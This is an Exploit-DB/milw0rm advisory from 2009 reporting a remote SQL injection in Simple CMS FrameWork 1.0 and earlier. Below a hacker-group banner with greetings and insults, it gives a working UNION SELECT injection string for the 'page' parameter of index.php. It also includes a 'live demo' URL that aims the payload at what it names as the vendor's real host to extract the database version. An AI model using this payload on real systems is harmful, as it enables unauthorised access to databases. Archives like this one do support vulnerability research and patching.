Simple CMS FrameWork <= 1.0 page Remote SQL Injection Vuln

2009-08-26T00:00:00
ID EDB-ID:9527
Type exploitdb
Reporter Red-D3v1L
Modified 2009-08-26T00:00:00

Description

Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln. Webapps exploit for php platform

                                        
                                            ==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Simple CMS FrameWork &lt;== 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Simple CMS FrameWork ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://westlingit.com/cms.php ]
    [»] Founder:             [ Red-D3v1L &lt; php-c0de@hotmail.com &gt; SQL@Hotmail.eS &lt; ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust &lt;&lt; Big Big Big Lamer &lt;&lt; ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?id=null&page=[SQL]

 [»] L1v3 d3m0 : 

http://dev.westlingit.com/simplecms/index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 


Author: Red-D3v1L &lt;-

###########################################################################

# milw0rm.com [2009-08-26]